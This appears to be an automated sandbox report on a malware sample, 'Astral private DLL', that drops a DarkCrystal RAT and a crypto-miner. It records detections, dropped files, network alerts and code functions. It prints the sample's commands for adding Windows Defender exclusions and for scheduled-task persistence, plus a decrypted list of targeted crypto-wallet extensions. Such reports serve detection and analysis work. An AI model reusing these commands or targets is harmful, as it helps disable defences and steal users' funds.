                                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 5800, ProcessName: powershell.exe

                                  Data Obfuscation

                                  barindex
                                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toes5wxx\toes5wxx.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toes5wxx\toes5wxx.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\containerperf/ServerComponenthostMonitorDll.exe", ParentImage: C:\containerperf\ServerComponenthostMonitorDll.exe, ParentProcessId: 6808, ParentProcessName: ServerComponenthostMonitorDll.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toes5wxx\toes5wxx.cmdline", ProcessId: 2424, ProcessName: csc.exe

                                  Persistence and Installation Behavior

                                  barindex
                                  Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\containerperf\lsass.exe'" /rl HIGHEST /f, CommandLine: schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\containerperf\lsass.exe'" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\system32\lsass.exe, ParentImage: C:\Windows\System32\lsass.exe, ParentProcessId: 628, ParentProcessName: lsass.exe, ProcessCommandLine: schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\containerperf\lsass.exe'" /rl HIGHEST /f, ProcessId: 1720, ProcessName: schtasks.exe
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-01-13T13:42:25.314532+010020362892Crypto Currency Mining Activity Detected192.168.2.4492411.1.1.153UDP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-01-13T13:42:27.409891+010020542471A Network Trojan was detected104.20.4.235443192.168.2.449927TCP
                                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                  2025-01-13T13:41:33.872716+010020480951A Network Trojan was detected192.168.2.44988837.44.238.25080TCP

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Source: AstralprivateDLL.exe.bin.exeAvira: detected
                                  Source: C:\Windows\appcompat\powershell.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                  Source: C:\Users\user\Desktop\AvUrEmYP.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeAvira: detection malicious, Label: VBS/Runner.VPG
                                  Source: C:\containerperf\lsass.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                  Source: C:\Users\user\AppData\Local\Temp\bcapgbqjwdsj.tmpAvira: detection malicious, Label: HEUR/AGEN.1362795
                                  Source: C:\Program Files\Windows Defender\Platform\sihost.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                  Source: C:\Windows\en-GB\WmiPrvSE.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                  Source: C:\containerperf\mtmIdTw4RygS3trJMnWvLFqF6dzRpLwhZvwqEPqaKDGsnR5lufKuCs3iyL.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                  Source: C:\Users\user\AppData\Local\Temp\bxCB1k3pGG.batAvira: detection malicious, Label: BAT/Delbat.C
                                  Source: C:\Windows\en-GB\WmiPrvSE.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                                  Source: C:\Users\user\Desktop\qHqBUadh.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                  Source: C:\Program Files\Google\Chrome\updater.exeReversingLabs: Detection: 79%
                                  Source: C:\Program Files\Google\Chrome\updater.exeVirustotal: Detection: 68%Perma Link
                                  Source: C:\Program Files\Windows Defender\Platform\sihost.exeReversingLabs: Detection: 60%
                                  Source: C:\Program Files\Windows Defender\Platform\sihost.exeVirustotal: Detection: 48%Perma Link
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeReversingLabs: Detection: 62%
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeVirustotal: Detection: 43%Perma Link
                                  Source: C:\Users\user\AppData\Local\Temp\bcapgbqjwdsj.tmpReversingLabs: Detection: 91%
                                  Source: C:\Users\user\AppData\Local\Temp\bcapgbqjwdsj.tmpVirustotal: Detection: 82%Perma Link
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeReversingLabs: Detection: 79%
                                  Source: C:\Users\user\Desktop\AvUrEmYP.logReversingLabs: Detection: 70%
                                  Source: C:\Users\user\Desktop\IbBZTfZC.logReversingLabs: Detection: 25%
                                  Source: C:\Users\user\Desktop\OMvfRcDl.logReversingLabs: Detection: 37%
                                  Source: C:\Users\user\Desktop\gYWllyYA.logReversingLabs: Detection: 29%
                                  Source: C:\Users\user\Desktop\qHqBUadh.logReversingLabs: Detection: 50%
                                  Source: C:\Windows\appcompat\powershell.exeReversingLabs: Detection: 60%
                                  Source: C:\Windows\en-GB\WmiPrvSE.exeReversingLabs: Detection: 60%
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeReversingLabs: Detection: 60%
                                  Source: C:\containerperf\WmiPrvSE.exeReversingLabs: Detection: 60%
                                  Source: C:\containerperf\lsass.exeReversingLabs: Detection: 60%
                                  Source: AstralprivateDLL.exe.bin.exeReversingLabs: Detection: 60%
                                  Source: AstralprivateDLL.exe.bin.exeVirustotal: Detection: 72%Perma Link
                                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                  Source: C:\Users\user\Desktop\QWRgRujm.logJoe Sandbox ML: detected
                                  Source: C:\Windows\appcompat\powershell.exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\gYWllyYA.logJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\AvUrEmYP.logJoe Sandbox ML: detected
                                  Source: C:\Program Files\Google\Chrome\updater.exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeJoe Sandbox ML: detected
                                  Source: C:\containerperf\lsass.exeJoe Sandbox ML: detected
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\AppData\Local\Temp\bcapgbqjwdsj.tmpJoe Sandbox ML: detected
                                  Source: C:\Program Files\Windows Defender\Platform\sihost.exeJoe Sandbox ML: detected
                                  Source: C:\Windows\en-GB\WmiPrvSE.exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\Desktop\nWKkNNTp.logJoe Sandbox ML: detected
                                  Source: C:\Windows\System32\SecurityHealthSystray.exeJoe Sandbox ML: detected
                                  Source: C:\Windows\en-GB\WmiPrvSE.exeJoe Sandbox ML: detected
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeJoe Sandbox ML: detected
                                  Source: AstralprivateDLL.exe.bin.exeJoe Sandbox ML: detected
                                  Source: 0000000D.00000002.2245855345.00000000126BD000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Custom","_1":"True","_2":"True","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"System drive"}}
                                  Source: 0000000D.00000002.2245855345.00000000126BD000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-iaIcn2RAvedg70EnUwKf","0","new(standoff)","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsYWJVWnpZekpWYVV4RFNUTkphbTlwV20xR2MyTXlWV2xNUTBrMFNXcHZhV1JJU2pGYVUwbHpTV3ByYVU5cFNqQmpibFpzU1dsM2FVMVVRV2xQYVVvd1kyNVdiRWxwZDJsTlZFVnBUMmxLYlZsWGVIcGFVMGx6U1dwRmVVbHFiMmxrU0VveFdsTkpjMGxxUlhwSmFtOXBaRWhLTVZwVFNYTkpha1V3U1dwdmFXUklTakZhVTBvNUlsMD0iXQ=="]

                                  Bitcoin Miner

                                  barindex
                                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                  Source: AstralprivateDLL.exe.bin.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeDirectory created: C:\Program Files\Windows Defender\Platform\sihost.exeJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeDirectory created: C:\Program Files\Windows Defender\Platform\66fc9ff0ee96c2Jump to behavior
                                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: AstralprivateDLL.exe.bin.exe, 00000000.00000003.1717902037.0000000003033000.00000004.00000020.00020000.00000000.sdmp, Astral private DLL.exe, 00000001.00000003.1728765563.0000000006653000.00000004.00000020.00020000.00000000.sdmp, Astral private DLL.exe, 00000001.00000003.1729671319.000000000665D000.00000004.00000020.00020000.00000000.sdmp, Astral private DLL.exe, 00000001.00000002.1759147036.0000000000193000.00000002.00000001.01000000.00000005.sdmp, Astral private DLL.exe, 00000001.00000000.1725815742.0000000000193000.00000002.00000001.01000000.00000005.sdmp

                                  Spreading

                                  barindex
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_0016A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,1_2_0016A69B
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_0017C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,1_2_0017C220
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeCode function: 2_2_0000024B3455BE3C FindFirstFileExW,2_2_0000024B3455BE3C
                                  Source: C:\Windows\System32\conhost.exeCode function: 8_2_00000216ACFDBE3C FindFirstFileExW,8_2_00000216ACFDBE3C
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_1AFFBE3C FindFirstFileExW,13_2_1AFFBE3C
                                  Source: C:\Windows\System32\conhost.exeCode function: 22_2_0000013ACAE9BE3C FindFirstFileExW,22_2_0000013ACAE9BE3C
                                  Source: C:\Windows\System32\winlogon.exeCode function: 27_2_00000225DC64BE3C FindFirstFileExW,27_2_00000225DC64BE3C
                                  Source: C:\Windows\System32\lsass.exeCode function: 28_2_00000202C0AEBE3C FindFirstFileExW,28_2_00000202C0AEBE3C
                                  Source: C:\Windows\System32\svchost.exeCode function: 30_2_000002A66130BE3C FindFirstFileExW,30_2_000002A66130BE3C
                                  Source: C:\Windows\System32\dwm.exeCode function: 31_2_000002BAAEFBBE3C FindFirstFileExW,31_2_000002BAAEFBBE3C
                                  Source: C:\Windows\System32\svchost.exeCode function: 34_2_0000026A879CBE3C FindFirstFileExW,34_2_0000026A879CBE3C
                                  Source: C:\Windows\System32\svchost.exeCode function: 35_2_00000179537ABE3C FindFirstFileExW,35_2_00000179537ABE3C
                                  Source: C:\Windows\System32\svchost.exeCode function: 36_2_000002295D56BE3C FindFirstFileExW,36_2_000002295D56BE3C

                                  Networking

                                  barindex
                                  Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49888 -> 37.44.238.250:80
                                  Source: Network trafficSuricata IDS: 2054247 - Severity 1 - ET MALWARE SilentCryptoMiner Agent Config Inbound : 104.20.4.235:443 -> 192.168.2.4:49927
                                  Source: unknownDNS query: name: pastebin.com
                                  Source: Network trafficSuricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.4:49241 -> 1.1.1.1:53
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: global trafficDNS traffic detected: DNS query: pool.hashvault.pro
                                  Source: global trafficDNS traffic detected: DNS query: pastebin.com
                                  Source: AstralprivateDLL.exe.bin.exe, 00000000.00000003.1726981626.0000000003569000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m

                                  System Summary

                                  barindex
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_1AFF26F0 NtQueryDirectoryFileEx,GetFileType,StrCpyW,13_2_1AFF26F0
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_1AFF2A7C NtEnumerateValueKey,NtEnumerateValueKey,13_2_1AFF2A7C
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_1AFF23F0 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,13_2_1AFF23F0
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_1AFF2CDC NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,13_2_1AFF2CDC
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_1AFF24DC NtQueryDirectoryFile,GetFileType,StrCpyW,13_2_1AFF24DC
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_1AFF21CC NtQuerySystemInformation,StrCmpNIW,13_2_1AFF21CC
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_1AFF29B4 NtEnumerateKey,NtEnumerateKey,13_2_1AFF29B4
                                  Source: C:\Windows\System32\dialer.exeCode function: 20_2_00007FF603B010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,20_2_00007FF603B010C0
                                  Source: C:\Windows\System32\winlogon.exeCode function: 27_2_00000225DC642A7C NtEnumerateValueKey,NtEnumerateValueKey,27_2_00000225DC642A7C
                                  Source: C:\Windows\System32\lsass.exeCode function: 28_2_00000202C0AE21CC NtQuerySystemInformation,StrCmpNIW,28_2_00000202C0AE21CC
                                  Source: C:\Windows\System32\lsass.exeCode function: 28_2_00000202C0AE26F0 NtQueryDirectoryFileEx,GetFileType,StrCpyW,28_2_00000202C0AE26F0
                                  Source: C:\Windows\System32\dwm.exeCode function: 31_2_000002BAAEFB2A7C NtEnumerateValueKey,NtEnumerateValueKey,31_2_000002BAAEFB2A7C
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_00166FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,1_2_00166FAA
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeFile created: C:\Windows\en-GB\WmiPrvSE.exeJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeFile created: C:\Windows\en-GB\24dbde2999530eJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeFile created: C:\Windows\appcompat\powershell.exeJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeFile created: C:\Windows\appcompat\e978f868350d50Jump to behavior
                                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\lsassl
                                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\lsass
                                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\sihosts
                                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\sihost
                                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\WmiPrvSEW
                                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\WmiPrvSE
                                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\ServerComponenthostMonitorDllS
                                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\ServerComponenthostMonitorDll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCC4EE3A879404710AD2E4883A563BED.TMP
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exe
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCC4EE3A879404710AD2E4883A563BED.TMP
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_0016848E1_2_0016848E
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_001740881_2_00174088
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_001700B71_2_001700B7
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_001640FE1_2_001640FE
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_001771531_2_00177153
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_001851C91_2_001851C9
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_001762CA1_2_001762CA
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_001632F71_2_001632F7
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_001743BF1_2_001743BF
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_0016C4261_2_0016C426
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_0018D4401_2_0018D440
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_0016F4611_2_0016F461
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_001777EF1_2_001777EF
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_0016286B1_2_0016286B
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_0018D8EE1_2_0018D8EE
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_0016E9B71_2_0016E9B7
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_001919F41_2_001919F4
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_00176CDC1_2_00176CDC
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_00173E0B1_2_00173E0B
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_00184F9A1_2_00184F9A
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeCode function: 1_2_0016EFE21_2_0016EFE2
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeCode function: 2_2_0000024B3451B23C2_2_0000024B3451B23C
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeCode function: 2_2_0000024B345216582_2_0000024B34521658
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeCode function: 2_2_0000024B3451F2F82_2_0000024B3451F2F8
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeCode function: 2_2_0000024B3451B0302_2_0000024B3451B030
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeCode function: 2_2_0000024B345120DC2_2_0000024B345120DC
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeCode function: 2_2_0000024B3455BE3C2_2_0000024B3455BE3C
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeCode function: 2_2_0000024B345622582_2_0000024B34562258
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeCode function: 2_2_0000024B3455FEF82_2_0000024B3455FEF8
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeCode function: 2_2_0000024B3455BC302_2_0000024B3455BC30
                                  Source: C:\Users\user\AppData\Local\Temp\twain_32.exeCode function: 2_2_0000024B34552CDC2_2_0000024B34552CDC
                                  Source: C:\Windows\System32\conhost.exeCode function: 8_2_00000216AAA7B23C8_2_00000216AAA7B23C
                                  Source: C:\Windows\System32\conhost.exeCode function: 8_2_00000216AAA7F2F88_2_00000216AAA7F2F8
                                  Source: C:\Windows\System32\conhost.exeCode function: 8_2_00000216AAA816588_2_00000216AAA81658
                                  Source: C:\Windows\System32\conhost.exeCode function: 8_2_00000216AAA7B0308_2_00000216AAA7B030
                                  Source: C:\Windows\System32\conhost.exeCode function: 8_2_00000216AAA720DC8_2_00000216AAA720DC
                                  Source: C:\Windows\System32\conhost.exeCode function: 8_2_00000216ACFDBC308_2_00000216ACFDBC30
                                  Source: C:\Windows\System32\conhost.exeCode function: 8_2_00000216ACFD2CDC8_2_00000216ACFD2CDC
                                  Source: C:\Windows\System32\conhost.exeCode function: 8_2_00000216ACFDBE3C8_2_00000216ACFDBE3C
                                  Source: C:\Windows\System32\conhost.exeCode function: 8_2_00000216ACFDFEF88_2_00000216ACFDFEF8
                                  Source: C:\Windows\System32\conhost.exeCode function: 8_2_00000216ACFE22588_2_00000216ACFE2258
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_1AFCF2F813_2_1AFCF2F8
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_1AFD165813_2_1AFD1658
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_1AFCB23C13_2_1AFCB23C
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_1AFC20DC13_2_1AFC20DC
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_1AFCB03013_2_1AFCB030
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_1AFF2CDC13_2_1AFF2CDC
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_1AFFFEF813_2_1AFFFEF8
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_1AFFBE3C13_2_1AFFBE3C
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_1B00225813_2_1B002258
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_1AFFBC3013_2_1AFFBC30
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_00007FFD9BAC0D7813_2_00007FFD9BAC0D78
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeCode function: 13_2_00007FFD9BEC014913_2_00007FFD9BEC0149
                                  Source: C:\Windows\System32\dialer.exeCode function: 20_2_00007FF603B0232820_2_00007FF603B02328
                                  Source: C:\Windows\System32\dialer.exeCode function: 20_2_00007FF603B014E420_2_00007FF603B014E4
                                  Source: C:\Windows\System32\dialer.exeCode function: 20_2_00007FF603B01DB420_2_00007FF603B01DB4
                                  Source: C:\Windows\System32\dialer.exeCode function: 20_2_00007FF603B026E820_2_00007FF603B026E8
                                  Source: C:\Windows\System32\conhost.exeCode function: 22_2_0000013ACAE620DC22_2_0000013ACAE620DC
                                  Source: C:\Windows\System32\conhost.exeCode function: 22_2_0000013ACAE6B03022_2_0000013ACAE6B030
                                  Source: C:\Windows\System32\conhost.exeCode function: 22_2_0000013ACAE6F2F822_2_0000013ACAE6F2F8
                                  Source: C:\Windows\System32\conhost.exeCode function: 22_2_0000013ACAE6B23C22_2_0000013ACAE6B23C
                                  Source: C:\Windows\System32\conhost.exeCode function: 22_2_0000013ACAE7165822_2_0000013ACAE71658
                                  Source: C:\Windows\System32\conhost.exeCode function: 22_2_0000013ACAE92CDC22_2_0000013ACAE92CDC
                                  Source: C:\Windows\System32\conhost.exeCode function: 22_2_0000013ACAE9BC3022_2_0000013ACAE9BC30
                                  Source: C:\Windows\System32\conhost.exeCode function: 22_2_0000013ACAE9FEF822_2_0000013ACAE9FEF8
                                  Source: C:\Windows\System32\conhost.exeCode function: 22_2_0000013ACAE9BE3C22_2_0000013ACAE9BE3C
                                  Source: C:\Windows\System32\conhost.exeCode function: 22_2_0000013ACAEA225822_2_0000013ACAEA2258
                                  Source: C:\Windows\System32\winlogon.exeCode function: 27_2_00000225DC62165827_2_00000225DC621658
                                  Source: C:\Windows\System32\winlogon.exeCode function: 27_2_00000225DC61B23C27_2_00000225DC61B23C
                                  Source: C:\Windows\System32\winlogon.exeCode function: 27_2_00000225DC61F2F827_2_00000225DC61F2F8
                                  Source: C:\Windows\System32\winlogon.exeCode function: 27_2_00000225DC61B03027_2_00000225DC61B030
                                  Source: C:\Windows\System32\winlogon.exeCode function: 27_2_00000225DC6120DC27_2_00000225DC6120DC
                                  Source: C:\Windows\System32\winlogon.exeCode function: 27_2_00000225DC65225827_2_00000225DC652258
                                  Source: C:\Windows\System32\winlogon.exeCode function: 27_2_00000225DC64BE3C27_2_00000225DC64BE3C
                                  Source: C:\Windows\System32\winlogon.exeCode function: 27_2_00000225DC64FEF827_2_00000225DC64FEF8
